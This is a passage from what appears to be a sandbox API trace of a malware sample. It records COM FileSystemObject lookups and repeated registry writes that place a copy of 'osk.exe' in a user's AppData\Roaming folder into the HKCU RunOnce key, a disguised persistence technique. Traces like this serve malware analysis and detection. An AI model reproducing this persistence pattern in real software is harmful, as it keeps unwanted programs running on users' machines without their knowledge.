ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), 
ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.297] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0092.297] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.297] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x79 [0092.297] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.298] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x78 [0092.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.298] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.298] IUnknown:Release (This=0x7a9740) 
returned 0x1 [0092.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.298] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.298] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.298] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.298] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.299] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.299] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.299] RegCloseKey (hKey=0x280) returned 0x0 [0092.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.299] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.299] SetTimer (hWnd=0x20280, nIDEvent=0x21f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f4 [0092.299] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0092.312] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.312] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.313] KillTimer (hWnd=0x20280, uIDEvent=0x21f4) returned 1 [0092.313] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.313] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.313] IUnknown:Release (This=0x787518) returned 0x1 [0092.313] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.313] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.314] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.314] 
FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.314] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0092.314] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.314] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7a [0092.314] 
FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.315] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0092.316] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.316] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.316] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.316] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.316] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.316] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.316] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.316] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.316] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.316] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.316] RegCloseKey (hKey=0x280) returned 0x0 [0092.317] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.317] SetTimer (hWnd=0x20280, nIDEvent=0x21f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f5 [0092.317] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.326] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.326] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.327] KillTimer (hWnd=0x20280, uIDEvent=0x21f5) returned 1 [0092.327] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.327] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.327] IUnknown:Release (This=0x787518) returned 0x1 [0092.327] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.327] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.327] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.328] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.328] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0092.328] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.328] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7b [0092.328] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.329] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0092.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.329] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.329] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.330] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.330] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.330] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.330] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.330] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.330] RegCloseKey (hKey=0x280) returned 0x0 [0092.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.331] SetTimer (hWnd=0x20280, nIDEvent=0x21f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f6 [0092.331] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.343] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.343] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.343] KillTimer (hWnd=0x20280, uIDEvent=0x21f6) returned 1 [0092.343] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.343] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.344] IUnknown:Release (This=0x787518) returned 0x1 [0092.344] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.344] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.344] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.344] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.344] 
